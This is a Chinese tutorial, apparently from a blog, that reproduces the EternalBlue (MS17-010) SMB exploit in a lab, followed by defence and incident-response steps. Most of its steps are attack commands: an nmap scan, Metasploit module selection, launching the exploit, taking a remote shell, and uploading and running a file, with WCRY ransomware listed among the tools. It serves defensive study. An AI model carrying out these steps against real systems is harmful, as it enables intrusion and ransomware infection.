永恒之蓝漏洞复现及防御
本教程是用于防御学习,请勿用于其他用处,否则后果自负,请遵守中华人民共和国网络安全法,作一名尊法守纪的好公民!
一、永恒之蓝简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经济人)公布一大批网络攻击工具、期中包含永恒之蓝工具,“永恒之蓝”利用windows系统的链接: SMB漏洞可以获取漏洞最高权限。5月12日,不法份子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高兴内网、大型企业内网和政府机关中招,被勒索支付高额赎金才能恢复文件。
二、漏洞原理
永恒之蓝是在window的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码,通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
三、SMB协议
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过 SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
四、实验环境
1.系统:攻击机(kali linux) win7(受害机)
2.工具:NMAP Metasploit WCRY(勒索病毒)
3.网络设置,确保攻击机能与受害机进行通信
五、漏洞复现
1.检测受害机和端口,使用nmap工具进行扫描,检测目标主机是否存活,以及445端口开放情况.
nmap xxx.xxx.xxx.xxx
2.打开kali自带的Metasploit渗透工具
msfconsole
3.输入永恒之蓝漏洞编号
search ms17-010
注意:以上图可以看到,多条可利用的模块信息,永恒之蓝用到第3个模块和第0个模块,第三个模块是扫描这个网段里面哪一个主机是由这个漏洞的(scanner扫描器),第0个模块是永恒之蓝的攻击模块.
4.使用第三个扫描器进行辅助扫描测试
use 3
5.查看该漏洞模块所需要的参数情况
show options
6.设置目标机器地址
set rhosts xxx.xxx.xxx.xxx
7.检测目标主机
Run
8.进入系统攻击模块
Use exploit/windows/smb/ms17_010_etrnalblue
9.查看参数配置情况
Show options
10.设置RHosts
set rhosts xxx.xxx.xxx.xxx
11.发起攻击
run
12.进入目标机器的shell
shell
注意:如出现乱码
chcp 65001
13.上传软件到目标机器
upload /xxx/xxxx C://
14.运行软件
excute -f C:// xxx
六、漏洞防御
1、禁用SMB1协议
2、使用防火墙阻止445端口的连接
3、使用进站/出站规则阻止445端口
4、不要随意打开陌生的文件,链接
七、应急响应方案
1、断网
2、禁用SMB服务
1.打开管理员权限运行命令窗口
net stop LanmanServer和sc config LanmanServer start= disabled
2.关闭139及445端口
打开运行窗口,输入gpedit.msc-ip安全策略,在本地计算机-按照向导完成操作,可参考以下链接操作
https://jingyan.baidu.com/article/d621e8da0abd192865913f1f.html
3.永久解决
打补丁,下载微软补丁,根据自己系统的版本下载响应补丁,补丁以下链接
https://technet.microsoft.com/zh-cn/library/security/MS17-010
本教程到此结束!谢谢!如有疑问请关注私信!